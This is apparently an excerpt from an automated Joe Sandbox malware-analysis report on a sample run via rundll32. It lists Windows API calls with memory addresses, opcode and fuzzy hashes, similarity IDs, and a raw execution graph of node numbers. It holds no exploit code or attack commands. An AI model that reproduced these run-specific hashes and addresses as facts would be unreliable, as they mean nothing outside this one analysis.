                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 041E8739
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 041E873F
                                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 041E8752
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 041E875B
                                                                              • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,041E87D2,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 041E8786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                              • API String ID: 1184211438-79381301
                                                                              • Opcode ID: d33bab5378bac1477687f4b91fdcddcc9479338ea3739362647c01c1c00710cc
                                                                              • Instruction ID: f0aaedc14cb592f90ee3f9bfaf86d52b245bea8507863d252cbd773161c46876
                                                                              • Opcode Fuzzy Hash: d33bab5378bac1477687f4b91fdcddcc9479338ea3739362647c01c1c00710cc
                                                                              • Instruction Fuzzy Hash: D2117F79D00A08AEEB10EFE7C8C0B7DB7F5EB41308F5484D6E404A3580D775BA808B11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 042158A5
                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 042158C1
                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 042158FA
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 04215977
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 04215990
                                                                              • VariantCopy.OLEAUT32(?), ref: 042159C5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                              • String ID:
                                                                              • API String ID: 351091851-3916222277
                                                                              • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                              • Instruction ID: cf3126c4db8e9667566fbdd8aee0b49aaaa78283524552593263ec0805e40c58
                                                                              • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                              • Instruction Fuzzy Hash: C0510DB5A10619AFDB22EB58CC80AD9B3FDAF59314F0041D5E509A7221DA70BF818FA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?), ref: 041E5D82
                                                                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 041E5D9C
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmp
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: bfe12e0a965e0a8ae89ae61f32f90924946e7f31ee9ad63e4dc3e3d6da22ab1b
                                                                              • Instruction ID: 372911cac0421e6308eafa42d2487fc422c9895276ff28943e939140c24b567d
                                                                              • Opcode Fuzzy Hash: bfe12e0a965e0a8ae89ae61f32f90924946e7f31ee9ad63e4dc3e3d6da22ab1b
                                                                              • Instruction Fuzzy Hash: 2271F739704B00AFE715CFAAC8C4B36BBD6EF45318F1882AAD5448B392D774E841CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCapture.USER32 ref: 043C7AC6
                                                                              • IsWindowUnicode.USER32(00000000), ref: 043C7B09
                                                                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 043C7B24
                                                                              • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 043C7B43
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 043C7B52
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 043C7B63
                                                                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 043C7B83
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                              • String ID:
                                                                              • API String ID: 1994056952-0
                                                                              • Opcode ID: 243006645f015927a6f88d55e7a800f3bc45409d855799a06a269baad8e71de6
                                                                              • Instruction ID: 7318a5178291d0556e60b218945a0bffadc43096bb0da8ede69c5c198df7fcff
                                                                              • Opcode Fuzzy Hash: 243006645f015927a6f88d55e7a800f3bc45409d855799a06a269baad8e71de6
                                                                              • Instruction Fuzzy Hash: 08214C7620460AAFA760FA59CD80F6B73DDEF04364B54582CFE5AC7642EB20FC018B60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 663633fca52b7758c0e2f8c739663ce86faaa63be569a9c2d7ff3f920377b970
                                                                              • Instruction ID: 3a1debde462cf0e4123f74f69e71743842fe76e919de05f55f5617dbde56256a
                                                                              • Opcode Fuzzy Hash: 663633fca52b7758c0e2f8c739663ce86faaa63be569a9c2d7ff3f920377b970
                                                                              • Instruction Fuzzy Hash: 1CC1557A710A005BE7149ABE9CC477EB7C79BC4329F58827EE214CB396DB65E805C350
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 041E8E38: GetCurrentThreadId.KERNEL32 ref: 041E8E3B
                                                                              • GetTickCount.KERNEL32 ref: 041E89E3
                                                                              • GetTickCount.KERNEL32 ref: 041E89FB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 041E8A2A
                                                                              • GetTickCount.KERNEL32 ref: 041E8A55
                                                                              • GetTickCount.KERNEL32 ref: 041E8A8C
                                                                              • GetTickCount.KERNEL32 ref: 041E8AB6
                                                                              • GetCurrentThreadId.KERNEL32 ref: 041E8B26
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$CurrentThread
                                                                              • String ID:
                                                                              • API String ID: 3968769311-0
                                                                              • Opcode ID: 98a96b6e3da6aa6528430e064ef2c5ae775bd39c9fd07b5bba259f8589f03d52
                                                                              • Instruction ID: 15c877badf48eb0fdc077ec38e1ec631550650271c93be2c7ccdda320d952541
                                                                              • Opcode Fuzzy Hash: 98a96b6e3da6aa6528430e064ef2c5ae775bd39c9fd07b5bba259f8589f03d52
                                                                              • Instruction Fuzzy Hash: 64417275208B419EE721BFBEC5C433FBBD1AF84358F05896CD4D887281EB75A4849752
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,04407788,00000000,?,041E9AEA,?,?,04413B9C,04413B9C,?,?,04408C38,041F0843,04407788), ref: 041E9A65
                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,04407788,00000000,?,041E9AEA,?,?,04413B9C,04413B9C,?,?,04408C38,041F0843), ref: 041E9A6B
                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,04407788,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04407788,00000000,?,041E9AEA,?,?,04413B9C), ref: 041E9A86
                                                                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,04407788,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04407788,00000000,?,041E9AEA,?,?), ref: 041E9A8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleWrite
                                                                              • String ID: Error$Runtime error at 00000000
                                                                              • API String ID: 3320372497-2970929446
                                                                              • Opcode ID: 409199b91664dc120d3b4ca2c155bfbedc2929dd719e8aa894d3c4437cfe794f
                                                                              • Instruction ID: 96680ba954d5bd0db76b844a0edc020c4a558896e1eb32b186c2b256ba91c522
                                                                              • Opcode Fuzzy Hash: 409199b91664dc120d3b4ca2c155bfbedc2929dd719e8aa894d3c4437cfe794f
                                                                              • Instruction Fuzzy Hash: 93F046F8690B447AFB20B7D18D82F3C262C9F84B19F204115F328684C4CBB878C4A722
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 041E6252
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 041E6258
                                                                              • GetStdHandle.KERNEL32(000000F4,041E53A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 041E6277
                                                                              • WriteFile.KERNEL32(00000000,000000F4,041E53A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 041E627D
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,041E53A0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 041E6294
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,041E53A0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 041E629A
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleWrite
                                                                              • String ID:
                                                                              • API String ID: 3320372497-0
                                                                              • Opcode ID: 11329ec6cbb160edb0ccf7d558fd021fc990d2e5196707820741d7660f748734
                                                                              • Instruction ID: 397addd4100029ea682ffdc6447a9e4d706aa8aaf7015bec152d0d4bf080b93c
                                                                              • Opcode Fuzzy Hash: 11329ec6cbb160edb0ccf7d558fd021fc990d2e5196707820741d7660f748734
                                                                              • Instruction Fuzzy Hash: 2701AFA9A08F117DF610F6EA9EC4F7B378D8F4966CF510610B118E60C2CB68AC4487B6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 041E5A1F
                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 041E5A35
                                                                              • Sleep.KERNEL32(00000000), ref: 041E5A63
                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 041E5A79
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: a2c4b061acfef69824bf2ca9909e576c34831284bf521f79fb3506d4617604fc
                                                                              • Instruction ID: bcddd9b2fc784ffb0ea59162ab357ef2669a6c2f30de81079b503408ee0d61dc
                                                                              • Opcode Fuzzy Hash: a2c4b061acfef69824bf2ca9909e576c34831284bf521f79fb3506d4617604fc
                                                                              • Instruction Fuzzy Hash: B4C15A7A601B129FE715CFAAD4C0779BFE2EB89318F0882AED5158B395D374A841C790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnumWindows.USER32(043C6848,00000000), ref: 043C6992
                                                                              • ShowWindow.USER32(?,00000000,043C6848,00000000), ref: 043C69D4
                                                                              • ShowOwnedPopups.USER32(00000000,?), ref: 043C6A03
                                                                              • ShowWindow.USER32(?,00000005), ref: 043C6A78
                                                                              • ShowOwnedPopups.USER32(00000000,?), ref: 043C6AA7
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Show$OwnedPopupsWindow$EnumWindows
                                                                              • String ID:
                                                                              • API String ID: 315437064-0
                                                                              • Opcode ID: b55690c11f7e9ac06e459378f403b8d89b13a31d52b195192802acf0999c0d35
                                                                              • Instruction ID: 82161eeb3f56e4bcfd92fcdb9c687d85ead0c6c2d15f9a2fb6b05825dd4fc0f1
                                                                              • Opcode Fuzzy Hash: b55690c11f7e9ac06e459378f403b8d89b13a31d52b195192802acf0999c0d35
                                                                              • Instruction Fuzzy Hash: AC418D74600B009FE720DB28C885BAA73D6FB84328F15692DE55AC72E1D734FC91DB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 043C5A5A
                                                                              • SetEvent.KERNEL32(00000000), ref: 043C5A86
                                                                              • GetCurrentThreadId.KERNEL32 ref: 043C5A8B
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 043C5AB4
                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 043C5AC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                              • String ID:
                                                                              • API String ID: 2132507429-0
                                                                              • Opcode ID: 3a45470aa303fb48be5cf49a96ea087f96ab6a3649595f35b6941671fdaf1a06
                                                                              • Instruction ID: e5e42f28654631f5f680dfcf05a6265c1c736052384615d44efbc9ca0f2f9e8e
                                                                              • Opcode Fuzzy Hash: 3a45470aa303fb48be5cf49a96ea087f96ab6a3649595f35b6941671fdaf1a06
                                                                              • Instruction Fuzzy Hash: 63016D71246211AFF702EBA9CD80B1A33E5EB44325F40992AFA54C72E0DF38BC40CB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 041ECBC9
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 041ECC27
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 041ECC84
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 041ECCB7
                                                                                • Part of subcall function 041ECB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,041ECC35), ref: 041ECB8B
                                                                                • Part of subcall function 041ECB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,041ECC35), ref: 041ECBA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                              • String ID:
                                                                              • API String ID: 2255706666-0
                                                                              • Opcode ID: 675a639b79097d32819f7bf83f74082a93306746a3f660b717cb00bb00c69994
                                                                              • Instruction ID: 782523f8f9ede8cf82dea6535005b9c0a06343cdfe40dae098cfd906914c2c37
                                                                              • Opcode Fuzzy Hash: 675a639b79097d32819f7bf83f74082a93306746a3f660b717cb00bb00c69994
                                                                              • Instruction Fuzzy Hash: DF314D75A0061E9BEB10DFEACCC4ABEB7B4EF04304F4441A5D911E7290EB74AA04CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetActiveWindow.USER32(?,?,044171C0,043C813C), ref: 043C74C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID:
                                                                              • API String ID: 2558294473-0
                                                                              • Opcode ID: 5025ad2765444b72e5533e97589a94224af36d047306ebcf89fd9bf0c43377f2
                                                                              • Instruction ID: 1cc2a796f54769413c7d1b6fa3b055c378c76cb69cd5d7caf600e56c8e52ba32
                                                                              • Opcode Fuzzy Hash: 5025ad2765444b72e5533e97589a94224af36d047306ebcf89fd9bf0c43377f2
                                                                              • Instruction Fuzzy Hash: 2E31FD70600281ABEB55FE68CCC5B9A37965F04308F0464B8AD04DF69ACB75FC85CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindow.USER32(?,00000004), ref: 043C685A
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 043C6877
                                                                              • GetCurrentProcessId.KERNEL32(?,00000004), ref: 043C6883
                                                                              • IsWindowVisible.USER32(?), ref: 043C68DD
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Process$CurrentThreadVisible
                                                                              • String ID:
                                                                              • API String ID: 3926708836-0
                                                                              • Opcode ID: 7b4d0ac2088e21256a5a8f6e1d3168c23271167198629f0f4dd3ac4a15e86d16
                                                                              • Instruction ID: a52f82c75bb9154a50b4f98f8c374e94a439390175bd6d91bcf9fb48ccff573e
                                                                              • Opcode Fuzzy Hash: 7b4d0ac2088e21256a5a8f6e1d3168c23271167198629f0f4dd3ac4a15e86d16
                                                                              • Instruction Fuzzy Hash: 7B314A35600305ABEB10DFA9D8C1EAA77A9FB45314F0451B9EA1497392DB35FD018BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnumWindows.USER32(043C6534), ref: 043C6625
                                                                              • GetWindow.USER32(00000003,00000003), ref: 043C663D
                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 043C664A
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 043C6689
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumLongWindows
                                                                              • String ID:
                                                                              • API String ID: 4191631535-0
                                                                              • Opcode ID: b9f19153142e44b060006386fa1d10f91b0e9ae56ab5c49e1fcef00fe4636658
                                                                              • Instruction ID: 545230925acc46cbae6e90ce02885ace1e4a68972d37c177af12d44263a333c8
                                                                              • Opcode Fuzzy Hash: b9f19153142e44b060006386fa1d10f91b0e9ae56ab5c49e1fcef00fe4636658
                                                                              • Instruction Fuzzy Hash: 1C113071705710AFEB10AB188CC5F99B7D49F46728F155268FDA8AF2D2C770AC418B62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 04311D11
                                                                              • GetCurrentProcessId.KERNEL32(?,?,00000000,043C9BD1,?,?,?,00000001,043C7DAB), ref: 04311D1A
                                                                              • GlobalFindAtomW.KERNEL32(00000000), ref: 04311D2F
                                                                              • GetPropW.USER32(00000000,00000000), ref: 04311D46
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 2582817389-0
                                                                              • Opcode ID: 60c6101a45e3e662f086040dd3c8da8e70787ba73fd1a26f546de919f12d8c66
                                                                              • Instruction ID: c9bf0c65d33b2db9538ee38f05d0424bacbcbdad8b3b471cad7cf9065a2b3172
                                                                              • Opcode Fuzzy Hash: 60c6101a45e3e662f086040dd3c8da8e70787ba73fd1a26f546de919f12d8c66
                                                                              • Instruction Fuzzy Hash: 74F065523442616ABF64B6FA9CC08BB369DCF181A57412921FB05D61B5D628FC4643B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:13.5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0.9%
                                                                              Total number of Nodes:1821
                                                                              Total number of Limit Nodes:29
12000->11931 12001->12000 12003 463cb95 12002->12003 12004 463cbae SetThreadPreferredUILanguages 12002->12004 12005 463cb9e GetThreadPreferredUILanguages 12003->12005 12004->11986 12005->12004 12007 463d3f9 12006->12007 12008 463d416 FindFirstFileW 12007->12008 12009 463d426 FindClose 12008->12009 12010 463d42c 12008->12010 12009->12010 12010->11939 12012 4639e7c GetUserDefaultUILanguage GetLocaleInfoW 12011->12012 12012->11944 12016 464028c 12013->12016 12015 4636f6d 12015->11874 12017 46402c1 TlsGetValue 12016->12017 12018 464029b 12016->12018 12019 46402a6 12017->12019 12020 46402cb 12017->12020 12018->12015 12024 46401c0 12019->12024 12020->12015 12022 46402ab TlsGetValue 12023 46402ba 12022->12023 12023->12015 12026 46401c6 12024->12026 12025 46401ea 12025->12022 12026->12025 12030 46401ac LocalAlloc 12026->12030 12028 46401e6 12028->12025 12029 46401f6 TlsSetValue 12028->12029 12029->12025 12030->12028 12032 463a20f 12031->12032 12033 463a1ec 12031->12033 12032->11777 12034 4639ddc 12033->12034 12037 463a1ff SysReAllocStringLen 12033->12037 12035 4639de2 SysFreeString 12034->12035 12036 4639df0 12034->12036 12035->12036 12036->11777 12037->12032 12038 4639d74 12037->12038 12039 4639d90 12038->12039 12040 4639d80 SysAllocStringLen 12038->12040 12039->11777 12040->12038 12040->12039 12042 463b6cd 12041->12042 12043 463b6ea 12041->12043 12044 463b6d2 12042->12044 12045 463b71e 12042->12045 12043->11777 12044->12043 12047 463b6e1 12044->12047 12050 463b75d 12044->12050 12045->12043 12046 463a1e8 3 API calls 12045->12046 12046->12045 12047->12043 12049 463b34c 26 API calls 12047->12049 12048 463b6b8 26 API calls 12048->12050 12049->12047 12050->12043 12050->12048 12052 463eb9e 12051->12052 12053 463eb60 14 API calls 12052->12053 12054 463ebb3 12053->12054 12057 463eaf4 12054->12057 12056 463ebca 12056->11777 12058 463eb27 12057->12058 12059 463eaff 12057->12059 12058->12056 12061 463e734 12059->12061 12062 463e750 12061->12062 12063 463e758 12061->12063 12073 
463e5d0 12062->12073 12065 463e474 13 API calls 12063->12065 12066 463e780 12065->12066 12067 463e7c3 12066->12067 12084 463e53c 12066->12084 12069 463e4dc 2 API calls 12067->12069 12071 463e7e4 12069->12071 12071->12058 12074 463e685 12073->12074 12075 463e5e9 12073->12075 12074->12063 12076 463e5fa 12075->12076 12095 4638850 12075->12095 12077 46389ac 13 API calls 12076->12077 12082 463e629 12077->12082 12079 463e658 12081 4638b44 2 API calls 12079->12081 12083 463e67d 12081->12083 12082->12079 12099 463e460 12082->12099 12083->12063 12085 463e544 12084->12085 12086 463e54d 12085->12086 12108 463e00c 12085->12108 12088 463e2f0 12086->12088 12089 463e30a 12088->12089 12090 463e313 12089->12090 12092 463e32d 12089->12092 12112 463c0c0 12090->12112 12093 463c0c0 26 API calls 12092->12093 12094 463e328 12092->12094 12093->12094 12094->12067 12096 463885e 12095->12096 12097 4638859 12095->12097 12096->12076 12102 4638724 GetModuleHandleW GetProcAddress 12097->12102 12100 4638850 5 API calls 12099->12100 12101 463e468 12100->12101 12101->12082 12103 463874c GetLogicalProcessorInformation 12102->12103 12107 4638794 12102->12107 12104 463875b GetLastError 12103->12104 12103->12107 12105 4638765 12104->12105 12104->12107 12106 463876d GetLogicalProcessorInformation 12105->12106 12106->12107 12107->12096 12109 463e017 12108->12109 12110 4638850 5 API calls 12109->12110 12111 463e01e 12110->12111 12111->12086 12115 463be18 12112->12115 12114 463c0ca 12114->12094 12116 463be56 12115->12116 12120 463be3b 12115->12120 12117 463bec4 12116->12117 12119 463bf91 12116->12119 12125 463bf2b 12117->12125 12126 463bdd4 12117->12126 12119->12125 12143 463b8f8 12119->12143 12120->12114 12121 463be18 26 API calls 12121->12125 12123 463bedc 12123->12125 12136 463b7d0 12123->12136 12125->12120 12125->12121 12127 464028c 4 API calls 12126->12127 12128 463bddd 12127->12128 12129 463bdf3 12128->12129 12130 463bde5 12128->12130 12133 464028c 4 API calls 12129->12133 12131 464028c 4 API calls 
12130->12131 12132 463bdea 12131->12132 12132->12123 12134 463be01 12133->12134 12135 464028c 4 API calls 12134->12135 12135->12132 12137 463b7ec 12136->12137 12138 463b830 12136->12138 12137->12138 12141 463b86a 12137->12141 12142 463b899 12137->12142 12138->12125 12139 463b7d0 26 API calls 12139->12141 12141->12138 12141->12139 12142->12138 12147 463b4f4 12142->12147 12144 463b901 12143->12144 12145 463b909 12143->12145 12146 463b6b8 26 API calls 12144->12146 12145->12125 12146->12145 12148 463b693 12147->12148 12149 463b517 12147->12149 12148->12142 12149->12148 12150 463b7d0 26 API calls 12149->12150 12151 463b4f4 26 API calls 12149->12151 12152 463eb8c 26 API calls 12149->12152 12153 463eb60 14 API calls 12149->12153 12150->12149 12151->12149 12152->12149 12153->12149 12160 46e3bf8 12154->12160 12169 46e4a9c 12157->12169 12161 46e3c1d 12160->12161 12163 465a894 46 API calls 12161->12163 12166 46e3c3a 12161->12166 12162 46e3bf4 12162->11784 12164 46e3c35 12163->12164 12165 4639410 4 API calls 12164->12165 12165->12166 12166->12162 12167 465a894 46 API calls 12166->12167 12168 4639410 4 API calls 12166->12168 12167->12166 12168->12166 12170 46e4abf 12169->12170 12171 465a894 46 API calls 12170->12171 12176 46e4adc 12170->12176 12173 46e4ad7 12171->12173 12172 46e4a98 12172->11784 12174 4639410 4 API calls 12173->12174 12174->12176 12175 465a894 46 API calls 12175->12176 12176->12172 12176->12175 12177 4639410 4 API calls 12176->12177 12177->12176 12178 483b842 12180 483b84d 12178->12180 12179 483b872 12186 483b889 12179->12186 12213 46e54f0 12179->12213 12180->12179 12206 472a6f0 12180->12206 12182 483b8a7 12184 483b8d6 12182->12184 12185 483ba0a 12182->12185 12188 463b08c 16 API calls 12184->12188 12187 463b08c 16 API calls 12185->12187 12191 463b104 16 API calls 12186->12191 12189 483ba32 12187->12189 12190 483b8fe 12188->12190 12192 466cff0 50 API calls 12189->12192 12193 466cff0 50 API calls 12190->12193 12194 483bd6b 12191->12194 12195 483ba40 12192->12195 
